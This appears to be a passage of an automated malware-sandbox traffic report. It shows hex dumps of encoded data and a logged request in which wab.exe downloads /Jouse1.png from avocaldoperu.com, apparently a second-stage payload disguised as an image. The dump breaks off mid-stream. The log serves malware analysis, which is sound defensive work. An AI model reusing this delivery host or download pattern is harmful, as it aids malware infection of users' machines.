                                                            2024-08-28 12:01:12 UTC1369INData Raw: 38 46 41 6c 43 55 70 63 6a 48 51 2b 42 79 43 58 71 41 69 6b 4c 32 68 5a 48 53 62 37 31 56 62 31 7a 32 75 4b 58 2f 4f 4a 56 53 75 78 46 43 76 31 7a 34 38 30 6e 6f 36 42 72 64 59 66 51 70 38 42 51 43 74 6b 5a 6c 33 2f 52 4d 35 4b 78 55 5a 43 43 74 79 70 61 2b 51 38 7a 36 57 52 6e 5a 49 4b 46 46 45 76 77 64 77 4a 70 48 52 70 74 36 74 57 31 51 77 6c 67 35 49 48 44 57 53 2f 7a 2f 6d 6e 67 2b 50 33 36 4c 66 72 72 55 2b 6a 4d 56 73 49 50 64 69 2f 4d 77 59 52 7a 35 31 62 37 72 5a 53 61 48 7a 6f 31 4c 72 67 30 75 41 39 53 4a 52 47 4c 64 63 36 45 6a 41 58 56 68 65 35 51 79 58 59 63 57 73 33 36 71 72 54 51 36 32 36 32 66 2f 31 77 66 6c 6c 41 55 35 58 54 4f 59 50 43 71 54 39 67 34 36 6c 64 44 36 33 7a 59 58 4d 52 43 57 44 6b 43 55 43 71 6d 2b 78 7a 64 76 59 74 79 57
                                                            Data Ascii: 8FAlCUpcjHQ+ByCXqAikL2hZHSb71Vb1z2uKX/OJVSuxFCv1z480no6BrdYfQp8BQCtkZl3/RM5KxUZCCtypa+Q8z6WRnZIKFFEvwdwJpHRpt6tW1Qwlg5IHDWS/z/mng+P36LfrrU+jMVsIPdi/MwYRz51b7rZSaHzo1Lrg0uA9SJRGLdc6EjAXVhe5QyXYcWs36qrTQ6262f/1wfllAU5XTOYPCqT9g46ldD63zYXMRCWDkCUCqm+xzdvYtyW
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 6e 73 63 33 36 53 34 31 77 77 51 44 42 72 6e 44 77 4b 45 43 58 67 61 69 6f 38 4d 68 79 62 68 47 78 55 56 54 32 64 37 4f 55 32 35 43 45 6f 65 39 55 71 37 52 52 71 46 6e 48 75 77 52 4a 7a 37 4d 61 36 36 69 55 73 67 65 79 62 78 49 37 57 31 63 33 55 2b 43 50 54 4d 30 53 4d 49 64 51 75 77 66 30 46 61 4a 58 76 72 70 32 30 74 62 48 4c 71 31 68 56 4d 78 78 68 65 2f 6d 75 6e 2b 45 50 6f 54 4c 6b 4e 75 36 35 6a 53 4d 66 38 65 7a 34 59 66 6a 31 50 74 72 56 38 6b 4d 50 65 51 69 69 6a 73 31 77 57 67 66 54 4d 31 65 46 31 59 72 6c 61 42 72 72 46 6a 36 68 7a 6a 71 44 30 7a 47 6f 76 4d 34 73 4c 51 34 68 76 74 7a 33 49 47 44 71 65 6f 66 57 4a 66 37 76 39 44 70 79 7a 4c 4a 50 45 73 61 70 4e 66 4d 68 58 42 51 5a 37 6f 72 6c 30 6f 39 78 2b 6c 72 64 49 78 57 53 68 55 45 43 4b
                                                            Data Ascii: nsc36S41wwQDBrnDwKECXgaio8MhybhGxUVT2d7OU25CEoe9Uq7RRqFnHuwRJz7Ma66iUsgeybxI7W1c3U+CPTM0SMIdQuwf0FaJXvrp20tbHLq1hVMxxhe/mun+EPoTLkNu65jSMf8ez4Yfj1PtrV8kMPeQiijs1wWgfTM1eF1YrlaBrrFj6hzjqD0zGovM4sLQ4hvtz3IGDqeofWJf7v9DpyzLJPEsapNfMhXBQZ7orl0o9x+lrdIxWShUECK
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 33 43 30 67 43 41 47 6c 30 6c 63 45 71 77 6e 6d 4d 2f 6d 6f 41 74 2b 36 4a 34 69 6f 73 34 48 50 38 67 54 44 65 4d 58 2b 66 4a 69 49 52 59 66 32 41 36 44 6e 59 5a 7a 4b 2b 45 67 6c 41 6b 68 68 42 68 4c 58 49 4e 67 45 6b 35 76 34 6b 43 65 47 69 6e 2f 53 36 2f 61 51 41 4a 56 53 36 42 37 41 77 58 55 4b 65 69 32 67 75 47 47 4f 70 44 72 36 75 47 7a 74 6d 6e 74 32 43 41 55 43 56 41 47 75 79 79 4e 33 61 4a 6b 46 41 57 43 71 34 5a 76 77 79 41 69 6d 38 30 69 68 78 61 61 50 48 4f 56 6d 70 35 7a 7a 35 5a 48 65 43 53 6c 50 37 31 7a 33 46 53 63 35 4b 4a 56 51 63 4c 35 78 2f 31 7a 35 62 4b 41 48 4e 65 4f 50 33 59 43 61 72 70 57 49 31 2b 44 44 61 73 55 52 55 63 72 48 67 75 6c 76 54 7a 79 33 34 49 70 48 53 2f 39 34 6c 55 63 67 69 72 2b 64 39 43 6f 48 52 68 56 69 43 62 5a
                                                            Data Ascii: 3C0gCAGl0lcEqwnmM/moAt+6J4ios4HP8gTDeMX+fJiIRYf2A6DnYZzK+EglAkhhBhLXINgEk5v4kCeGin/S6/aQAJVS6B7AwXUKei2guGGOpDr6uGztmnt2CAUCVAGuyyN3aJkFAWCq4ZvwyAim80ihxaaPHOVmp5zz5ZHeCSlP71z3FSc5KJVQcL5x/1z5bKAHNeOP3YCarpWI1+DDasURUcrHgulvTzy34IpHS/94lUcgir+d9CoHRhViCbZ
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 38 51 6a 68 44 37 6a 58 35 72 57 79 79 43 57 54 6b 79 43 57 65 35 6c 64 56 76 4c 2f 36 55 6a 50 74 71 53 57 65 56 79 48 58 64 72 2f 69 48 72 6a 32 57 2f 54 6f 74 2b 69 6c 5a 4b 4e 75 49 61 39 46 41 61 32 34 54 6a 30 6c 52 4f 43 33 74 56 69 4a 78 7a 41 31 34 74 6e 4c 6d 2b 48 56 58 72 39 70 6e 70 79 31 5a 6a 42 52 4c 73 47 39 36 48 55 2b 43 45 77 6b 63 51 79 6b 4a 49 62 62 67 32 53 4f 4a 57 73 67 69 75 2b 4a 76 4e 2f 6d 45 31 6b 4a 68 44 75 6b 4f 2f 4d 2f 52 76 35 62 4f 50 33 64 43 61 66 70 75 39 66 64 65 61 77 79 37 4a 72 48 34 74 30 41 76 42 4c 6e 44 55 35 75 2f 4b 70 59 46 6f 6a 32 6f 72 4c 37 7a 59 64 52 75 65 42 37 76 5a 73 71 79 63 2b 44 63 51 42 72 2f 2f 44 2f 55 47 69 4a 66 6a 54 48 6b 68 46 35 55 2f 33 35 69 55 75 5a 7a 61 32 6a 39 66 6e 6c 52 39
                                                            Data Ascii: 8QjhD7jX5rWyyCWTkyCWe5ldVvL/6UjPtqSWeVyHXdr/iHrj2W/Tot+ilZKNuIa9FAa24Tj0lROC3tViJxzA14tnLm+HVXr9pnpy1ZjBRLsG96HU+CEwkcQykJIbbg2SOJWsgiu+JvN/mE1kJhDukO/M/Rv5bOP3dCafpu9fdeawy7JrH4t0AvBLnDU5u/KpYFoj2orL7zYdRueB7vZsqyc+DcQBr//D/UGiJfjTHkhF5U/35iUuZza2j9fnlR9
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 46 59 4b 50 31 48 6f 4f 4a 65 35 36 75 67 30 5a 57 4c 70 68 72 71 59 6b 50 6d 62 63 46 2b 47 39 4f 6a 48 50 6d 6f 64 4b 31 2b 36 70 65 4e 6a 39 39 62 53 6c 79 53 64 6b 47 47 35 66 73 47 6f 50 58 72 54 30 48 61 64 69 53 56 76 42 66 67 6d 6b 64 4e 5a 63 35 33 41 2b 57 52 32 54 42 51 68 2b 39 64 66 7a 78 67 44 31 69 56 58 55 41 5a 6d 76 39 63 39 63 49 49 7a 45 69 55 33 7a 39 65 6c 62 2f 54 2f 50 6c 7a 71 31 4b 2b 33 74 75 44 44 39 65 49 43 7a 41 62 71 31 66 34 35 32 41 6d 52 6c 70 70 71 76 77 77 54 7a 62 73 78 67 2f 69 5a 46 4c 57 69 32 39 32 70 6b 69 43 57 43 75 75 36 66 69 37 2f 2b 50 39 62 32 45 69 57 61 5a 39 78 69 46 37 2f 2b 56 2f 44 63 43 66 54 6f 74 2b 69 74 52 4b 4d 78 63 67 6f 33 67 37 55 48 65 53 4b 49 72 7a 2f 4b 58 69 4f 66 43 77 44 75 62 6c 57
                                                            Data Ascii: FYKP1HoOJe56ug0ZWLphrqYkPmbcF+G9OjHPmodK1+6peNj99bSlySdkGG5fsGoPXrT0HadiSVvBfgmkdNZc53A+WR2TBQh+9dfzxgD1iVXUAZmv9c9cIIzEiU3z9elb/T/Plzq1K+3tuDD9eICzAbq1f452AmRlppqvwwTzbsxg/iZFLWi292pkiCWCuu6fi7/+P9b2EiWaZ9xiF7/+V/DcCfTot+itRKMxcgo3g7UHeSKIrz/KXiOfCwDublW
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 5a 47 77 37 56 59 46 51 54 64 32 4a 4b 39 76 6c 43 32 56 4e 77 6b 35 54 65 52 31 70 68 36 56 61 61 47 4d 6a 41 6d 35 2f 56 67 78 64 79 31 59 69 56 73 45 45 46 43 72 64 51 77 6c 35 36 67 4e 34 52 4b 41 63 6e 71 4d 78 4f 6a 39 68 68 75 35 55 51 52 35 58 2f 2b 52 6c 4d 37 4c 43 46 37 76 34 72 47 37 68 69 56 46 79 4f 46 49 57 6f 75 4c 53 4b 56 30 50 75 43 54 53 7a 6f 49 77 6e 76 35 4f 50 77 2f 48 46 50 6c 52 39 48 67 6d 66 77 48 5a 52 64 49 54 2b 59 57 76 72 4a 69 75 6b 76 6e 7a 55 4f 4f 65 55 4c 62 4d 6f 62 48 78 79 4b 59 64 53 36 4e 34 57 63 54 6c 75 4e 52 33 7a 65 31 54 36 6a 39 75 33 69 6c 64 44 36 44 34 54 42 6f 74 6d 44 5a 45 6b 49 6c 67 73 63 68 6a 48 36 2f 2f 75 39 54 49 39 4d 6c 6d 73 4b 30 32 73 4f 2f 2f 74 75 4f 70 4f 73 74 61 6a 43 71 34 77 79 76
                                                            Data Ascii: ZGw7VYFQTd2JK9vlC2VNwk5TeR1ph6VaaGMjAm5/Vgxdy1YiVsEEFCrdQwl56gN4RKAcnqMxOj9hhu5UQR5X/+RlM7LCF7v4rG7hiVFyOFIWouLSKV0PuCTSzoIwnv5OPw/HFPlR9HgmfwHZRdIT+YWvrJiukvnzUOOeULbMobHxyKYdS6N4WcTluNR3ze1T6j9u3ildD6D4TBotmDZEkIlgschjH6//u9TI9MlmsK02sO//tuOpOstajCq4wyv
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 6c 59 4f 50 33 65 43 61 7a 70 57 49 31 32 44 53 55 71 62 54 4c 38 38 33 76 7a 6c 30 6c 75 30 43 65 2f 53 61 68 65 67 64 39 2f 4a 6d 52 77 32 77 4d 4a 2b 4e 6d 49 6e 58 51 69 63 71 2f 62 2b 4a 4e 74 43 51 37 4f 6c 59 6e 78 2f 46 44 43 38 66 35 52 57 77 45 61 59 4b 70 57 58 72 35 6f 2f 2f 63 34 30 64 4f 6f 44 67 72 43 70 58 5a 63 32 31 56 36 49 51 4d 6d 54 33 54 50 4c 4b 33 4a 45 4b 44 41 59 49 7a 7a 69 5a 42 51 42 68 56 6b 6f 37 38 6b 67 48 59 59 58 38 2f 31 45 69 79 51 62 58 66 2b 39 73 35 45 36 69 33 77 76 2f 71 37 4d 73 52 45 4a 62 61 65 46 79 6c 44 74 7a 4c 72 66 6e 56 58 4b 47 31 48 56 77 61 57 2f 4c 43 75 73 7a 76 35 42 6a 7a 4d 71 5a 59 57 6a 71 68 34 63 6b 4a 59 79 44 6b 69 55 73 7a 62 33 6c 30 41 75 4e 53 35 64 41 52 62 31 37 44 43 2f 41 67 6c 5a
                                                            Data Ascii: lYOP3eCazpWI12DSUqbTL883vzl0lu0Ce/Sahegd9/JmRw2wMJ+NmInXQicq/b+JNtCQ7OlYnx/FDC8f5RWwEaYKpWXr5o//c40dOoDgrCpXZc21V6IQMmT3TPLK3JEKDAYIzziZBQBhVko78kgHYYX8/1EiyQbXf+9s5E6i3wv/q7MsREJbaeFylDtzLrfnVXKG1HVwaW/LCuszv5BjzMqZYWjqh4ckJYyDkiUszb3l0AuNS5dARb17DC/AglZ
                                                            2024-08-28 12:01:12 UTC1369INData Raw: 57 74 70 75 4f 35 53 54 70 75 70 54 43 34 48 59 55 47 62 67 4d 62 53 48 43 2f 2f 47 65 53 71 78 4c 31 34 4d 70 38 44 34 49 70 4d 36 66 57 61 35 72 31 6c 4f 6e 63 44 35 61 48 73 77 6a 33 7a 7a 31 7a 46 4a 54 5a 63 6d 4a 56 6e 41 5a 69 43 72 31 2f 42 4b 58 7a 53 42 59 4f 50 33 65 41 62 54 70 57 49 31 58 41 7a 73 72 63 52 59 34 39 59 71 44 2f 4d 31 47 4f 45 6c 51 77 76 48 2b 55 6b 33 42 50 51 69 6b 75 41 30 2f 70 7a 31 58 49 4c 77 4f 4b 35 42 6b 45 6f 53 76 7a 46 76 62 41 74 64 71 33 6e 4e 63 6b 49 4c 79 75 69 76 4b 70 39 34 77 33 4a 78 6f 42 38 79 63 2f 47 4f 6c 39 64 30 49 73 7a 6c 78 75 46 65 74 4f 55 4a 6b 38 65 44 44 34 31 48 54 30 43 58 6d 2f 4c 72 52 5a 32 43 51 77 7a 35 71 65 66 36 54 4f 32 49 45 36 4e 4d 37 6f 37 2b 30 46 57 55 35 64 76 32 6a 41 71
                                                            Data Ascii: WtpuO5STpupTC4HYUGbgMbSHC//GeSqxL14Mp8D4IpM6fWa5r1lOncD5aHswj3zz1zFJTZcmJVnAZiCr1/BKXzSBYOP3eAbTpWI1XAzsrcRY49YqD/M1GOElQwvH+Uk3BPQikuA0/pz1XILwOK5BkEoSvzFvbAtdq3nNckILyuivKp94w3JxoB8yc/GOl9d0IszlxuFetOUJk8eDD41HT0CXm/LrRZ2CQwz5qef6TO2IE6NM7o7+0FWU5dv2jAq


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449737104.21.62.2024437328C:\Program Files (x86)\Windows Mail\wab.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-08-28 12:01:49 UTC171OUTGET /Jouse1.png HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                            Host: avocaldoperu.com
                                                            Cache-Control: no-cache
                                                            2024-08-28 12:01:49 UTC680INHTTP/1.1 200 OK
                                                            Date: Wed, 28 Aug 2024 12:01:49 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 494656
                                                            Connection: close
                                                            Last-Modified: Tue, 27 Aug 2024 22:07:49 GMT
                                                            ETag: "78c40-620b178d83740"
                                                            Cache-Control: max-age=14400
                                                            CF-Cache-Status: REVALIDATED
                                                            Accept-Ranges: bytes
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7koUFLUf62ZgiS8Gkt6PK1fW9bOqxuxKf0aaQidbmROmHX3yePK1Adgy4mE14jaAASMn6uhf5vboZJf1lxz8PnxlEZOfogHfrMXk5aQZKMnM0LBZPYTlWjjeWvTCmOnFY5J%2B"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ba4261a6e39b9c5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-08-28 12:01:49 UTC689INData Raw: 84 cf d6 83 7a ba aa 06 7e ae 01 10 9c 75 09 46 b1 3c 10 76 52 40 8d 56 ad 4f 28 df 56 7a 5e 8f 80 9c 7e 67 dd 2c 70 8b 4e ed d7 84 e1 f5 72 f0 f0 2f b8 6f 77 81 35 bd c3 4f 9c 42 50 ec c9 45 1f 07 7e e0 0c 1c ae 06 46 6d fc eb dd 6d 80 51 b0 7c a4 58 c1 3f b1 f6 74 c5 16 4d 3e 8a c3 ca 74 5b e4 bd 72 3e dd 86 93 93 f2 93 8e c9 ea 86 30 0f 3b 6e 26 74 46 75 84 83 ad c9 7d c1 08 85 cf 2f 9c 15 6f 3e 67 48 15 29 03 41 d1 d1 61 ae da 4d 9f 58 25 76 25 52 e9 ef 77 11 ff dc 3d be 82 31 b1 ee 23 e4 31 57 13 13 4f c7 f2 47 42 c5 3d 10 63 30 77 28 70 af 2b 44 94 12 b9 98 55 2b 24 b2 c1 e4 b4 4d 16 22 cf d3 7f 43 9a fb ab f3 5e 43 ca 0b 9f 83 e9 7c f1 bb 52 17 eb e1 eb 4c a2 ca a3 7e 54 e8 fb 96 e3 30 2b a7 e9 f7 c2 1c 6e c6 c2 57 b7 f7 48 b0 65 f1 c5 10 52 a9 03
                                                            Data Ascii: z~uF<vR@VO(Vz^~g,pNr/ow5OBPE~FmmQ|X?tM>t[r>0;n&tFu}/o>gH)AaMX%v%Rw=1#1WOGB=c0w(p+DU+$M"C^C|RL~T0+nWHeR
                                                            2024-08-28 12:01:49 UTC1369INData Raw: 7c df 6f b7 48 67 fe 5f ae 84 65 58 69 ec 66 4d 1e 4a a3 75 80 3b 9b 6a 89 66 1a 31 62 21 68 39 ac f3 cb 04 19 6a 84 59 23 90 e8 d3 7c 86 75 09 8a 4f 1d 1a 31 11 b5 0d 00 9d 94 6d bb 29 9c 15 d6 4f 8b 45 80 5a 6b 88 6d 21 a3 54 1b cf f0 3c f2 04 e9 dc 5b 4c f6 06 e3 ca 9d f0 be 1b 1a 29 62 31 2b 20 de 54 a0 ee 1c 9d c7 ce d4 5d 0b e9 60 2d ea 8d 96 3d 7c f6 c2 dc 07 e2 36 00 12 2a f6 d5 ee 27 a5 37 08 24 2e 70 6a 12 6c 00 cc 73 15 5d 91 12 82 da 82 5b 09 a4 fb c7 e8 a7 ab 27 85 c8 49 9d dc d2 0d 20 fe 9e ef cb d7 86 ac 58 5f 02 a8 2d 04 cd b1 8f e0 c6 17 ac 31 29 2f f3 8e 30 3e ba d2 71 48 ca b8 76 89 dd 2f 1a 14 59 3d 09 e5 91 bc 9f 86 f0 e6 b6 fe 27 e7 a3 33 61 70 ff 9a 6c 8d 44 c5 e4 cc f7 bf e7 37 ee d8 be 14 0d 47 4c b5 e2 23 4b 25 e6 8f d5 0e 14 8a
                                                            Data Ascii: |oHg_eXifMJu;jf1b!h9jY#|uO1m)OEZkm!T<[L)b1+ T]`-=|6*'7$.pjls]['I X_-1)/0>qHv/Y='3aplD7GL#K%
                                                            2024-08-28 12:01:49 UTC1369INData Raw: b6 82 aa 4e ed ca c4 d6 b5 d6 c7 25 f2 d1 71 ca 8b 7d 57 60 ae 28 38 17 12 97 30 7b 0e e1 64 1d f6 5f fe aa bd 2d d7 33 f2 8c df c3 4c 4f 27 6e e7 e9 20 b3 c3 2f 7a 32 77 af 19 0e f5 eb f3 67 2a 45 cc 44 af 98 28 47 a4 d7 78 ad 61 5e d0 6c f7 20 8d ef 66 77 4b fc cf 16 9e 32 8a f4 85 2a 55 d4 7e d4 c2 26 25 7b c2 fa b1 24 2f 69 61 71 d7 cb 13 ae 5b c6 a5 90 d2 a5 b9 d7 21 15 97 6e 21 2a 05 67 aa f2 39 db a4 d5 6c 99 d4 a2 77 f8 a4 51 46 75 3d d0 bd c4 99 f0 08 40 f6 3a 68 f4 66 18 2d 9b ac 08 7c 0b 3f ae 52 1c 4c 8b 7e 8a 9b d9 ff 86 4b f1 6b 3b 26 6e 87 81 c2 a2 8c 77 67 56 3a 44 08 2d fa ed 1c 45 7a eb d1 06 91 f2 9e 97 4d f8 a2 21 12 fa 02 50 45 0e b9 58 72 fb dd 25 ec cf a6 ad 30 d3 69 24 22 a4 08 aa f6 1e 72 a0 35 ae 5e 57 f0 af 7e 4b 9e a7 75 7f 0a
                                                            Data Ascii: N%q}W`(80{d_-3LO'n /z2wg*ED(Gxa^l fwK2*U~&%{$/iaq[!n!*g9lwQFu=@:hf-|?RL~Kk;&nwgV:D-EzM!PEXr%0i$"r5^W~Ku
                                                            2024-08-28 12:01:49 UTC1369INData Raw: 57 05 4a ed a2 21 1b ca 03 a3 ad 52 be ae 22 69 c4 d4 4f 49 ed ab d5 87 b4 a5 75 c1 42 74 8e af af be 2f 14 f2 ca e1 ca 18 41 cc 9d e9 2e ed d2 cf af 42 2c f5 7a 74 6d ca 4a 26 6a 0b 81 16 16 d8 36 22 d0 bd a4 3d 8d 94 34 6b 49 f5 1a 21 1b 87 da ac 9b 25 d7 53 c3 93 6e ad dc 48 ee e0 56 97 7e 8b 0e 49 d0 03 a0 87 80 51 51 2c 29 14 e5 2b 59 bf 32 c5 16 c0 72 ae eb 22 42 5d e4 bd ff 72 f9 c6 7b be f4 93 8e 44 a6 a2 68 e7 1f 68 26 74 cb 39 a0 f3 45 d2 63 c0 08 08 4d 14 ae 1b 6f 8a 86 8a 32 91 02 80 90 d4 95 c6 b3 3e 57 2b 51 19 42 ad 04 a6 ef 72 9e b2 bb 26 f3 11 d3 06 8f b2 94 39 33 7a c9 0c b3 08 11 44 84 14 40 55 98 c5 78 a6 0a d0 d9 55 b9 f2 75 7b d7 fc b1 e3 bb 57 3f 49 eb 5d ec 3d 59 ec a9 e6 e5 c5 05 a2 39 66 c0 81 30 69 1c 2e 04 04 48 3d d5 83 6f 08
                                                            Data Ascii: WJ!R"iOIuBt/A.B,ztmJ&j6"=4kI!%SnHV~IQQ,)+Y2r"B]r{Dhh&t9EcMo2>W+QBr&93zD@UxUu{W?I]=Y9f0i.H=o
                                                            2024-08-28 12:01:49 UTC1369INData Raw: c5 b7 82 11 0c 4c 3a 35 4e 02 1a 07 fa f0 e1 f3 32 7d 50 d0 c2 8a 9f 14 3c 6a 92 fa d0 a6 ee 93 f9 67 a9 3b 11 54 88 4b a8 e3 23 a9 10 30 79 c9 77 c8 d8 89 62 00 ef 00 e1 fd d5 14 4b d7 62 f0 68 d4 be 36 c6 a6 83 d5 f5 c8 22 b5 cc 37 66 4f 34 ce cb 78 97 12 53 86 91 bd af b3 c8 43 08 c6 e8 bb 8e 68 15 b5 de 45 69 53 49 fe 20 18 30 a1 00 44 36 07 ce 5e f9 15 a6 4d 64 57 b1 54 53 aa c6 91 9a dc 52 eb a1 5f 2d fb 4b bb f5 c1 84 95 ba 86 a6 97 a1 b6 fe d4 ea cf 0d 92 bb cf 21 f1 4e 74 b5 a0 54 6d 7d 47 f2 d4 b2 2e 06 84 aa 63 ce 34 c4 15 e3 fd de 89 2f 0d 88 7b d4 98 c6 85 83 24 76 20 09 b7 ea 17 de 4c ac 5b 9a a0 59 54 32 2a 3b f3 39 cd 7a 20 0d 13 e7 5f e2 10 4c a7 1b 1a b3 91 df df 60 a4 30 ee 7a b9 2d b9 ce 63 e9 02 aa 55 25 91 07 49 e6 0f 5e b2 74 a1 47
                                                            Data Ascii: L:5N2}P<jg;TK#0ywbKbh6"7fO4xSChEiSI 0D6^MdWTSR_-K!NtTm}G.c4/{$v L[YT2*;9z _L`0z-cU%I^tG
                                                            2024-08-28 12:01:49 UTC1369INData Raw: 96 81 3d 25 7e ca 90 b0 6c 28 d1 b5 c9 a2 82 63 91 13 40 93 7c 23 a5 97 9e 32 30 00 6d e7 66 cc 3a 1e ab 0c 17 09 d0 6b 4a 45 c7 02 b9 c9 32 ae 55 06 a7 5e 27 db 46 08 d2 aa 3c e3 ec c1 67 7f 4b 44 1e 41 16 5e 72 d0 e0 ff b3 af 35 92 91 0f c0 ab b1 c2 74 b0 5f 81 87 b5 70 b5 1c 97 90 2d 86 ae ca e1 b1 ed 24 90 ec ab 9a bf 81 35 fc 32 d0 be 88 87 fd 28 3c 46 fa d3 df 76 52 3f 31 d1 d8 98 ad 49 17 96 df e6 b9 23 2b 75 7b d9 24 f4 20 49 b7 1c 4b d9 a6 18 c4 21 91 75 b8 b9 94 62 b6 e6 be bb a8 b9 dc ba 71 67 f9 51 c8 fc 4a b4 00 0d 58 2d e2 a9 21 e8 e8 f5 6c 15 88 b2 a3 f5 46 38 c8 02 68 94 1b 55 b6 8f e1 60 2c ee 92 f7 6a ac 72 a2 5c 1e eb 6e b2 22 16 77 d6 1a 8d 99 00 af a3 3b b9 69 bf 71 cf a8 b8 cf ed a3 d9 29 fa ba 30 96 21 8b f1 05 6d bf a2 f4 87 42 78
                                                            Data Ascii: =%~l(c@|#20mf:kJE2U^'F<gKDA^r5t_p-$52(<FvR?1I#+u{$ IK!ubqgQJX-!lF8hU`,jr\n"w;iq)0!mBx
                                                            2024-08-28 12:01:49 UTC1369INData Raw: c5 d0 2d c3 9f 7d e2 30 8b ad e4 81 7f dd 63 3e 6f d6 fb 86 ec 83 dd 14 83 d1 77 a0 5d bd 14 be c5 a3 1e 81 ad 5c 38 b0 bd d5 4d c8 8c f4 f1 95 bb 71 2c ca d7 23 88 82 87 7f 12 a4 22 2d 4b 37 20 6f 3e c8 71 16 43 50 7b 9a 5b af bc 8e 9c f2 b5 5c 6c d9 65 d0 a1 a0 c8 6d 31 37 aa 84 b3 d1 ff ca 71 7f e0 c1 49 71 78 43 2b 7d 7f 76 4c 82 1f f5 b7 dd ee 4a 54 59 76 83 d2 ce 39 a3 4e bd c1 71 d9 0c a5 68 fd 67 71 4b 2a 77 37 0f bf 32 08 b4 1e 57 4b 1e 73 1b 35 62 7b be 30 5e 0d 66 08 6f 44 d6 5b a6 84 4a e6 77 a5 d4 0e 5e 3f 7c a6 96 a9 12 b1 8d a1 66 42 f9 1d cd 8c dc c2 ba 2d 11 d8 2e 6b 2c 3c a5 58 e1 97 47 c7 b7 9e 10 3b aa 96 c3 5f 59 e7 17 2f 35 2f 31 58 54 d8 ba 0f 62 76 07 18 26 ef af 13 e3 d3 86 d6 44 5e b3 fd 57 ee c0 c1 a6 04 2e 2e 39 53 ce d6 70 78
                                                            Data Ascii: -}0c>ow]\8Mq,#"-K7 o>qCP{[\lem17qIqxC+}vLJTYv9NqhgqK*w72WKs5b{0^foD[Jw^?|fB-.k,<XG;_Y/5/1XTbv&D^W..9Spx
                                                            2024-08-28 12:01:49 UTC1369INData Raw: 99 31 cb ea 25 3f 86 d1 30 7f 7d 9e f1 c1 6f a5 19 18 b7 74 20 9b 73 86 c3 18 e9 20 bf 9d 8f ee e8 41 57 c0 5a e3 0c 57 91 67 18 12 26 05 51 5e 7d fd 86 68 93 e7 bf 98 4c 62 8d 43 9c de 43 d5 03 dc 8e 43 36 2c a3 28 76 b9 eb 3d b2 a4 16 2a 88 f1 5c 9c 03 45 a0 fa e6 b8 f7 f0 da fc 06 7c 49 af c9 7d f1 a1 37 ab 4f 8d 53 4c 83 ec 6e 36 6a de 4c 20 94 13 3b 8f b8 1f 6d 7d 26 42 e8 b3 fa fb 5d f1 7b bd d2 b9 14 d1 47 61 e8 9d e7 56 54 52 c7 66 c2 b4 a0 d0 89 31 1a b1 b2 b2 2c 99 1a 7e a9 38 d9 da 98 79 25 37 77 91 f8 d9 88 5c 4b 38 b5 1a 6f 1d 1b f5 72 8a 22 de 82 9b a3 40 3a 66 27 71 dc cc 7d 98 bc 9c ab f7 ac d8 bf 4f c9 74 22 b6 73 c4 50 d8 f0 e0 27 b1 1d 78 26 6e 49 f7 c7 eb 08 cb 3f b8 6d 09 b7 81 5d b0 78 f8 a2 24 8c bb 57 57 09 80 df 38 75 d5 09 c0 fc
                                                            Data Ascii: 1%?0}ot s AWZWg&Q^}hLbCCC6,(v=*\E|I}7OSLn6jL ;m}&B]{GaVTRf1,~8y%7w\K8or"@:f'q}Ot"sP'x&nI?m]x$WW8u
                                                            2024-08-28 12:01:49 UTC1369INData Raw: ba 73 7c d1 67 63 3b ca 69 fd 00 05 4f 9d fa d5 8e 9b 82 5d b8 09 88 15 40 b8 f1 0d 90 8a c0 c4 23 ec d3 3d ca 2c b3 df be fa a6 d6 d7 bc 3e 7a 1c c6 3e ef 0d cf 01 6d e3 ba 42 90 f6 8e 6b 57 55 1c ac f4 6d a7 cb 87 2a 64 fa ba 45 c9 1a ef 6c ba 80 05 59 68 2e f1 b6 74 a2 5a fa c9 06 13 f6 a4 da 4a c7 15 27 e7 e7 cc 01 40 be ca 83 42 ab 0a 94 5b 01 95 92 6c 42 32 eb 0c e1 b2 0e 53 36 e1 b5 ab 61 b4 90 3b fc 63 e8 a4 7a 4c eb e6 be c6 c2 fe 8c 10 67 dc d5 ba ad d9 2e 94 59 27 73 75 6c 92 88 cf 02 19 4e b9 94 91 5b a7 4a 73 95 ee 37 0e 9b 49 76 01 0d 9a 9c d0 09 42 8d b5 91 a2 8f 90 3f 1e 8a 81 ba 6e 28 ee c4 91 a5 b0 4a 20 d3 08 63 21 15 2d f7 7a 4a 7c 02 07 e2 8e 26 d5 dc 7a e2 f2 e3 73 f1 ca 38 f0 40 5c 73 01 aa a2 7b 7d a8 2f 15 74 08 8e a8 d3 c3 8b 88
                                                            Data Ascii: s|gc;iO]@#=,>z>mBkWUm*dElYh.tZJ'@B[lB2S6a;czLg.Y'sulN[Js7IvB?n(J c!-zJ|&zs8@\s{}/t
                                                            2024-08-28 12:01:49 UTC1369INData Raw: b8 1c 15 16 12 ac 6d c5 0e 6f d4 d5 f4 75 68 c6 2e 7c 6f 81 6e bf 61 d8 8a e9 a3 af 45 71 f0 2c 2b f2 41 0d 54 05 65 b5 3a 4b c5 d4 d2 46 c2 98 28 14 f1 77 35 70 41 b2 0a af 9e db 1a 0d 74 41 82 65 c4 7b 60 99 7f c0 22 3e b9 de 0d 0f 0c 01 6b f5 f6 e2 01 e8 00 aa 01 62 ed 23 05 9f b7 84 bf b3 48 b0 67 f1 b1 d4 86 8c b5 6b 01 6e de ba 43 30 30 07 1e 12 ff 6a b4 e2 b1 e2 54 8c dc e1 c1 11 d4 a5 63 a5 f5 de 93 11 97 aa a0 9f 4e 6d 45 8e c4 da 3c d8 4c 39 76 14 ed ae 67 dc 85 a7 6c e7 88 72 e6 5a 19 4d 43 72 72 f5 1f 9f 58 d4 ca 16 2b 04 13 de 52 59 d1 29 41 3a 9b d1 41 41 6e 8d f4 64 cc 81 18 88 fe 64 80 1d de 99 74 f7 4a c2 c1 49 af d5 